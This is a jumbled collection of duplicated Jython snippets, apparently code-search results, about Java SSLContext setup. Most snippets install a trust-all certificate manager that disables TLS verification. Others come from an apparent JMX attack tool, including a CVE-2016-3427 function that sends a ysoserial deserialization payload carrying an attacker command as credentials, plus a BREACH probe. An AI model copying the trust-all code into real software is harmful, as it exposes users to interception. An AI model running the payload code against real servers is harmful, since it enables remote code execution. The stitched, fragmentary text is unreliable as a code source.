def initSSL(cls): import sys if not 'java' in sys.platform or cls.SSL_INITED: return logger.info('=============Init Trust All Cert==================') from javax.net.ssl import X509TrustManager from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): '''Define a custom TrustManager which will blindly accept all certificates''' def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = [TrustAllX509TrustManager()] TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) # Keep a static reference to the JVM's default SSLContext for restoring at a later time cls.DEFAULT_CONTEXT = SSLContext.getDefault() cls.TRUST_ALL_CONTEXT = TRUST_ALL_CONTEXT cls.SSL_INITED = True
def disable_all_ssl_cert_checks(self): from javax.net.ssl import TrustManager, X509TrustManager from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): """ Define a custom TrustManager which will blindly accept all certificates """ def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager self.log.info("Disabling cert check ##############") trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT) # Keep a static reference to the JVM's default SSLContext for restoring # at a later time DEFAULT_CONTEXT = SSLContext.getDefault()
def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi") print "[+] Connecting to: " + str(jmx_url) try: # for passing credentials for password if args.jmxpassword and args.jmxrole: print("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword)) credentials = array([args.jmxrole, args.jmxpassword], String) environment = {JMXConnector.CREDENTIALS: credentials} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) else: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except: print "[-] Error: Can't connect to remote service" if "Authentication failed! Invalid username or password" in str( sys.exc_info()[1]): print "[-] Authentication failed! Invalid username or password" sys.exit(-1)
def initSSL(cls): if not 'java' in sys.platform or cls.SSL_INITED: return logger.info('=============Init Trust All Cert==================') from javax.net.ssl import X509TrustManager from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): '''Define a custom TrustManager which will blindly accept all certificates''' def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None trust_managers = [TrustAllX509TrustManager()] TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) # Keep a static reference to the JVM's default SSLContext for restoring at a later time cls.DEFAULT_CONTEXT = SSLContext.getDefault() cls.TRUST_ALL_CONTEXT = TRUST_ALL_CONTEXT cls.SSL_INITED = True
def trust_all_certs(): # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT)
def _get_ssl_context(keyfile, certfile, ca_certs): if certfile is None and ca_certs is None: log.debug("Using default SSL context", extra={"sock": "*"}) return SSLContext.getDefault() else: log.debug( "Setting up a specific SSL context for keyfile=%s, certfile=%s, ca_certs=%s", keyfile, certfile, ca_certs, extra={"sock": "*"}) if ca_certs: # should support composite usage below trust_managers = _get_ca_certs_trust_manager( ca_certs).getTrustManagers() else: trust_managers = None if certfile: key_managers = _get_openssl_key_manager(certfile, keyfile).getKeyManagers() else: key_managers = None # FIXME FIXME for performance, cache this lookup in the future # to avoid re-reading files on every lookup context = SSLContext.getInstance("SSL") context.init(key_managers, trust_managers, None) return context
def _enableTrustAllCertificates(cls, enable=True): logger.info('Enable trust all certs') cls.initSSL() from javax.net.ssl import SSLContext if enable and TrustAllCert.TRUST_ALL_CONTEXT: SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT) elif TrustAllCert.DEFAULT_CONTEXT: SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def trust_all_certificates(): """Blindly trusts all certificates; note this is a per-JVM process setting.""" if not TrustAllCertificates._blind_trust: print >> sys.stderr, "Trusting all certificates without verifying them for this process." print >> sys.stderr, "It would be best to install certificates in the JVM's trust store." print >> sys.stderr, "Currently there is no way to turn this off." trust_managers = array(TrustManager, [TrustAllX509TrustManager()]) trust_all_context = SSLContext.getInstance("SSL") trust_all_context.init(None, trust_managers, None) SSLContext.setDefault(trust_all_context) TrustAllCertificates._blind_trust = True
def wrapped(*args, **kwargs): # Only do this if running under Jython if 'java' in sys.platform: from javax.net.ssl import SSLContext SSLContext.setDefault(TRUST_ALL_CONTEXT) try: res = f(*args, **kwargs) return res finally: SSLContext.setDefault(DEFAULT_CONTEXT) else: return f(*args, **kwargs)
def trust_all_certificates(): """Blindly trusts all certificates; note this is a per-JVM process setting.""" global _blind_trust if not _blind_trust: print >> sys.stderr, "Trusting all certificates without verifying them for this process." print >> sys.stderr, "It would be best to install certificates in the JVM's trust store." print >> sys.stderr, "Currently there is no way to turn this off." trust_managers = array(TrustManager, [TrustAllX509TrustManager()]) trust_all_context = SSLContext.getInstance("SSL") trust_all_context.init(None, trust_managers, None) SSLContext.setDefault(trust_all_context) _blind_trust = True
def trust_all_certificates(request): '''Decorator function that will make it so the context of the decorated method will run with our TrustManager that accepts all certificates''' # Only do this if running under Jython is_java = 'java' in sys.platform if is_java: from javax.net.ssl import SSLContext SSLContext.setDefault(TRUST_ALL_CONTEXT) def fin(): if is_java: SSLContext.setDefault(DEFAULT_CONTEXT) request.addfinalizer(fin)
def ignoreJavaSSL(): """ Creates a dummy socket factory that doesn't verify connections. HttpsURLConnection.setDefaultSSLSocketFactory(...) This code was taken from multiple sources. Only makes since in jython (java). otherwise, just use verify=False! """ import sys if not 'java' in sys.platform: raise RuntimeError('only use if platform (sys.platform) is java!') else: #=================================================================== # set default SSL socket to ignore verification #=================================================================== import javax.net.ssl.X509TrustManager as X509TrustManager # @UnresolvedImport class MyTrustManager(X509TrustManager): def getAcceptedIssuers(self,*args,**keys): return None def checkServerTrusted(self,*args,**keys): pass def checkClientTrusted(self,*args,**keys): pass import com.sun.net.ssl.internal.ssl.Provider # @UnresolvedImport from java.security import Security # @UnresolvedImport Security.addProvider(com.sun.net.ssl.internal.ssl.Provider()) trustAllCerts = [MyTrustManager()] import javax.net.ssl.SSLContext as SSLContext # @UnresolvedImport sc = SSLContext.getInstance("SSL"); import java.security.SecureRandom as SecureRandom # @UnresolvedImport sc.init(None, trustAllCerts,SecureRandom()) import javax.net.ssl.HttpsURLConnection as HttpsURLConnection # @UnresolvedImport HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory()) #=================================================================== # Do a test! #=================================================================== ''' # setup proxy import java.net.Proxy as Proxy import java.net.InetSocketAddress as InetSocketAddress p = Proxy(Proxy.Type.HTTP,InetSocketAddress("host",port)) import java.net.URL as URL u = URL("https://www.google.com/") conn = u.openConnection(p) print 'server response: %r',conn.getResponseCode() ''' #=================================================================== # ignore requests's error logging - this is for dev #=================================================================== try: import requests.packages.urllib3 as urllib3 urllib3.disable_warnings() except: pass return 'SSL verification in Java is disabled!'
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias): from java.io import BufferedInputStream, FileInputStream from java.security import KeyStore from java.security.cert import CertificateFactory, X509Certificate from javax.net.ssl import SSLContext, TrustManagerFactory fis = FileInputStream(pemCertificateFile) bis = BufferedInputStream(fis) ca = CertificateFactory.getInstance("X.509").generateCertificate(bis) ks = KeyStore.getInstance(KeyStore.getDefaultType()) ks.load(None, None) ks.setCertificateEntry(pemCertificateAlias, ca) tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm()) tmf.init(ks) context = SSLContext.getInstance("SSL") context.init(None, tmf.getTrustManagers(), None) SSLContext.setDefault(context)
def trustAllCertificate(self): from javax.net.ssl import TrustManager, X509TrustManager from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT)
def use_secure_ssl(client, protocols): context = SSLContext.getInstance('SSL') context.init(None, [DefaultTrustManager], SecureRandom()) factory = SSLSocketFactory(protocols)(context) https = Scheme('https', factory, 443) schemeRegistry = client.getWebConnection().getHttpClient( ).getConnectionManager().getSchemeRegistry() schemeRegistry.register(https)
def _get_ssl_context(keyfile, certfile, ca_certs): if certfile is None and ca_certs is None: return SSLContext.getDefault() else: if ca_certs: # should support composite usage below trust_managers = _get_ca_certs_trust_manager(ca_certs).getTrustManagers() else: trust_managers = None if certfile: key_managers = _get_openssl_key_manager(certfile, keyfile).getKeyManagers() else: key_managers = None # cache this lookup in the future to avoid re-reading files on every # lookup context = SSLContext.getInstance("SSL") context.init(key_managers, trust_managers, None) return context
def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi") print "[+] Connecting to: " + str(jmx_url) try: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except IOException: print "[-] Error: Can't connect to remote service" sys.exit(-1)
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias): from java.io import BufferedInputStream, FileInputStream from java.security import KeyStore from java.security.cert import CertificateFactory, X509Certificate from javax.net.ssl import SSLContext, TrustManagerFactory fis = FileInputStream(pemCertificateFile) bis = BufferedInputStream(fis) ca = CertificateFactory.getInstance("X.509").generateCertificate(bis) ks = KeyStore.getInstance(KeyStore.getDefaultType()) ks.load(None, None) ks.setCertificateEntry(pemCertificateAlias, ca) tmf = TrustManagerFactory.getInstance( TrustManagerFactory.getDefaultAlgorithm()) tmf.init(ks) context = SSLContext.getInstance("SSL") context.init(None, tmf.getTrustManagers(), None) SSLContext.setDefault(context)
def connectToJMX(args): # Basic JMX connection, always required trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) if args.jmxmp: jmx_url = jmxmp_url(args) else: jmx_url = jxmrmi_url(args) # import after url in order to import the correct protocol implementation from javax.management.remote import JMXConnector from javax.management.remote import JMXConnectorFactory print "[+] Connecting to: " + str(jmx_url) try: # for passing credentials for password if args.jmxpassword and args.jmxrole: print("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword)) credentials = array([args.jmxrole, args.jmxpassword], String) environment = {JMXConnector.CREDENTIALS: credentials} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) else: jmx_connector = JMXConnectorFactory.connect(jmx_url) print "[+] Connected: " + str(jmx_connector.getConnectionId()) bean_server = jmx_connector.getMBeanServerConnection() return bean_server except: print "[-] Error: Can't connect to remote service" if "Authentication failed! Invalid username or password" in str( sys.exc_info()[1]): print "[-] Authentication failed! Invalid username or password" if "Connection refused to host: 127.0.0.1" in str(sys.exc_info()): print "[-] Connection refused to 127.0.0.1! Try the localhost_bypass" sys.exit(-1)
def _get_ssl_context(keyfile, certfile, ca_certs): if certfile is None and ca_certs is None: log.debug("Using default SSL context", extra={"sock": "*"}) return SSLContext.getDefault() else: log.debug("Setting up a specific SSL context for keyfile=%s, certfile=%s, ca_certs=%s", keyfile, certfile, ca_certs, extra={"sock": "*"}) if ca_certs: # should support composite usage below trust_managers = _get_ca_certs_trust_manager(ca_certs).getTrustManagers() else: trust_managers = None if certfile: key_managers = _get_openssl_key_manager(certfile, keyfile).getKeyManagers() else: key_managers = None # FIXME FIXME for performance, cache this lookup in the future # to avoid re-reading files on every lookup context = SSLContext.getInstance("SSL") context.init(key_managers, trust_managers, None) return context
def cve_2016_3427Mode(args): if not os.path.isfile('./jars/ysoserial.jar'): print "[-] Error: Did not find ysoserial.jar in jars directory. Please download it from https://github.com/frohoff/ysoserial and move it in the jars directory" sys.exit(1) sys.path.append("./jars/ysoserial.jar") print "[+] Added ysoserial API capacities" from ysoserial.payloads.ObjectPayload import Utils payload_object = Utils.makePayloadObject(args.gadget, args.cmd) trust_managers = array([TrustAllX509TrustManager()], TrustManager) sc = SSLContext.getInstance("SSL") sc.init(None, trust_managers, None) SSLContext.setDefault(sc) from javax.management.remote import JMXConnector from javax.management.remote import JMXConnectorFactory jmx_url = jxmrmi_url(args) print "[+] Connecting to: " + str(jmx_url) try: environment = {JMXConnector.CREDENTIALS: payload_object} jmx_connector = JMXConnectorFactory.connect(jmx_url, environment) except: if "java.io.InvalidClassException: filter status: REJECTED" in str( sys.exc_info()): print "[-] Not vulnerable" elif "Credentials should be String[]" in str(sys.exc_info()): print "[+] Object was deserialized, target could be vulnerable" print "[?]: Returned error: " print str(sys.exc_info()) print "[+] Done"
def use_insecure_ssl(client, protocols): """Installs a fake trust manager and hostname verifier on an HTMLUnit WebClient, ensuring that it will never balk at poorly set up SSL servers. """ context = SSLContext.getInstance('SSL') context.init(None, [FakeX509TrustManager()], SecureRandom()) # Normal factory with SSLv2Hello, SSLv3, TLSv1 enabled factory = SSLSocketFactory(protocols)(context) factory.setHostnameVerifier( org.apache.http.conn.ssl.AllowAllHostnameVerifier()) https = Scheme('https', factory, 443) schemeRegistry = client.getWebConnection().getHttpClient( ).getConnectionManager().getSchemeRegistry() schemeRegistry.register(https)
def testPage(self, page): class MyTrustManager(X509TrustManager): def getAcceptedIssuers(self): return None def checkClientTrusted(self, certs, auth): pass def checkServerTrusted(self, certs, auth): pass trustAllCerts = [MyTrustManager()] sc = SSLContext.getInstance("SSL") sc.init(None, trustAllCerts, SecureRandom()) HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory()) class MyHostnameVerifier(HostnameVerifier): def verify(self, host, sess): return True HttpsURLConnection.setDefaultHostnameVerifier(MyHostnameVerifier()) try: httpsURL = 'https://%s:%s/%s' % (self._host, self._port, page) url = URL(httpsURL) conn = url.openConnection() conn.setConnectTimeout(5000) conn.setRequestProperty("Accept-encoding", 'gzip,deflate,compress') conn.setRequestProperty( "User-agent", 'https://google.com/' if 'google' not in self._host else 'https://yandex.ru/') # Use foreign referer #ist = conn.getInputStream() #isr = InputStreamReader(ist) #br = BufferedReader(isr) print("[BREACH] Received response: %d" % conn.getResponseCode()) if conn.getContentEncoding() != None: print("[BREACH] Received Content-encoding: %s" % (conn.getContentEncoding())) return True except: print("[BREACH] Socket timeout or an error occurred") return False
def createSSLSocket(host, port): ''' Creates SSL Socket @types: str, int -> javax.net.ssl.SSLSocket ''' # Create own TrustManager to be able to accept all certificates (even invalid) # configure the SSLContext with a TrustManager ctx = SSLContext.getInstance("TLS") keyManagers = jarray(KeyManager) trustManagers = jarray(TrustManager) trustManagers.append(DefaultTrustManager()) ctx.init(keyManagers, trustManagers, SecureRandom()) # Gets the default static SSLSocketFactory that is inherited by new instances of this class. # The socket factories are used when creating sockets for secure https URL connections. factory = ctx.getSocketFactory() # Creates a socket and connects it to the specified remote host at the specified remote # port. This socket is configured using the socket options established for this # factory. return factory.createSocket(host, int(port))
def fin(): if is_java: SSLContext.setDefault(DEFAULT_CONTEXT)
"""Define a custom TrustManager which will blindly accept all certificates""" def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) # Keep a static reference to the JVM's default SSLContext for restoring # at a later time DEFAULT_CONTEXT = SSLContext.getDefault() @pytest.fixture def trust_all_certificates(request): """Decorator function that will make it so the context of the decorated method will run with our TrustManager that accepts all certificates""" # Only do this if running under Jython is_java = "java" in sys.platform if is_java: from javax.net.ssl import SSLContext
from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): '''Define a custom TrustManager which will blindly accept all certificates''' def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT) class TestClient(threading.Thread): TOTAL_COUNT = 0 IS_EXIT = False def __init__(self, host, port=None): threading.Thread.__init__(self, name=threading.active_count()) self.host = host self.port = port self.conn = HTTPSConnection(self.host, self.port, timeout=ARGS.BATCH_SIZE*ARGS.BATCHES/2) self.count = 0 #random.shuffle(TestClient.ids)
# Copied from http://tech.pedersen-live.com/2010/10/trusting-all-certificates-in-jython/ import sys # Check if running in Jython if 'java' in sys.platform: from javax.net.ssl import TrustManager, X509TrustManager from jarray import array from javax.net.ssl import SSLContext class TrustAllX509TrustManager(X509TrustManager): """ Define a custom TrustManager which will blindly accept all certificates """ def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) # Keep a static reference to the JVM's default SSLContext for restoring # at a later time DEFAULT_CONTEXT = SSLContext.getDefault()
def enableTrustAllCertificates(cls): logger.info('Enable trust all certs') cls.initSSL() from javax.net.ssl import SSLContext SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
def initChannel(self, ch): pipeline = ch.pipeline() engine = SSLContext.getDefault().createSSLEngine() engine.setUseClientMode(True); pipeline.addLast("ssl", SslHandler(engine))
class TrustAllX509TrustManager(X509TrustManager): '''Define a custom TrustManager which will blindly accept all certificates''' def checkClientTrusted(self, chain, auth): pass def checkServerTrusted(self, chain, auth): pass def getAcceptedIssuers(self): return None # Create a static reference to an SSLContext which will use # our custom TrustManager trust_managers = array([TrustAllX509TrustManager()], TrustManager) TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL") TRUST_ALL_CONTEXT.init(None, trust_managers, None) SSLContext.setDefault(TRUST_ALL_CONTEXT) class TestClient(threading.Thread): TOTAL_COUNT = 0 IS_EXIT = False def __init__(self, host, port=None): threading.Thread.__init__(self, name=threading.active_count()) self.host = host self.port = port self.conn = HTTPSConnection(self.host, self.port, timeout=ARGS.BATCH_SIZE * ARGS.BATCHES / 2)